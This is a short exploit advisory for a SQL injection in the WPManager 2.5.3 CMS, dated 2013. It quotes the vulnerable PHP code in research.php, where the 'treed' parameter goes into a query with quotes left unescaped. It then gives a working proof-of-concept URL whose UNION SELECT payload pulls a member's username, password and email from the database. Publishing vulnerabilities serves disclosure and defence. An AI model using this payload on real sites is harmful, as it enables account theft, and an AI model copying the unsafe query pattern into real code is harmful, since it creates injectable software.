# Exploit Title: WPManager <= 2.5.3 SQL injection
# Date: 02/09/2013
# Exploit Author: Groucho
# Vendor Homepage: http://wpmanager.be/
# Version: 2.5.3
# Tested on: Debian
Introduction
============
WPmanager is a simple game-oriented CMS, which incorporated evereything you need to create a complete website (blog forum, etc...)
SQL injection
-------------
--------------------[research.php]-------------------------
1 2if( isset( $_GET['treed'] ) || isset( $_POST['treed'] ) ) 3{ 4 $treed = ( isset( $_GET['treed'] ) ) ? htmlSpecialChars( $_GET['treed'] ) : htmlSpecialChars( $_POST['treed'] ); 5 6} 7 8(......) 9 10f ( $_GET['treed'] != '' ) 11{ 12$Tpl->create_block( 'no_empty_forum_treed' ); 13 $message_treed = mysql_query("SELECT * FROM forum_s WHERE auteur= '".$treed."' ORDER BY id DESC LIMIT 20")or die(mysql_error());
the user input named 'treed' is only passed in the htmlSpecialChars function, which doesn't escape the simple quote.
Bim. Sql injection.
Proof of concept
================
You must be logged.
http://pentest.lan/wpmanager/research.php?treed=-%27%20union%20select%201,2,3,4,5,%28select%20concat%28user,%200x3a,%20password,%200x3a,%20mailconfirme%29%20from%20membre%20where%20id=1%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20-
Groucho